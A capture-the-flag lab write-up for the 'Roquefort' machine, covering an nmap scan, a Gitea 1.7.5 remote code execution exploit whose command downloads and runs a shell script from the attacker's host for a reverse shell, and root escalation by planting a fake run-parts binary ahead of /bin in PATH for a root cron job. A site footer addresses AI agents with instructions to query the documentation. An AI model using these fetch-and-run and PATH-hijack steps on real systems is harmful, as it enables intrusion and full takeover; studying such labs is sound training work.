# Roquefort

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 -Pn 192.168.157.67 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:40 +08
Nmap scan report for 192.168.157.67
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE
21/tcp   open   ftp
22/tcp   open   ssh
2222/tcp open   EtherNetIP-1
3000/tcp open   ppp
```

FTP does not allow for anonymous logins.

### Web Enum -> Gitea RCE

Only port 3000 has a webpage:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-a6fd9dffe1746a364c5a5da10f6b98c8d172f831%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

In the bottom left, we can see the version, which is vulnerable to RCE:

```
$ searchsploit gitea 1.7.5
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Gitea 1.7.5 - Remote Code Execution                        | multiple/webapps/49383.py
----------------------------------------------------------- ---------------------------------
```

We can create any account, and then use these settings:

```
USERNAME = "test123"
PASSWORD = "test123"
HOST_ADDR = '192.168.45.196'
HOST_PORT = 3000
URL = 'http://192.168.157.67:3000'
CMD = 'wget http://192.168.45.196:21/shell.sh && bash shell.sh'
```

We would then get a reverse shell:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-40a59beb0da30ff57202b290246299b0f0c175ba%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Cronjob Path -> Root

`linpeas.sh` picked up that we can write to the Systemd PATH:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4bc14d27234b4c60e600cc1625bf0df911d68ac5%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

This means we just need to find some process from `root` that doesn't use the full PATH. I used `pspy64` to find such a process.

```
2023/07/15 22:55:01 CMD: UID=0    PID=13493  | run-parts --report /etc/cron.hourly 
```

`run-parts` should work.

```
chloe@roquefort:/tmp$ which run-parts
/bin/run-parts
```

Since the `/bin` directory is the last in PATH, we can place our malicious binary within `/usr/local/bin` to be executed first.

```bash
cd /usr/local/bin
wget 192.168.45.196:21/run-parts
chmod 777 run-parts
```

Then, start a listener port and wait for `root` to execute the binary:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-12b8d481a0a764a0706722c678a6040a5afd2f9f%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/roquefort.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.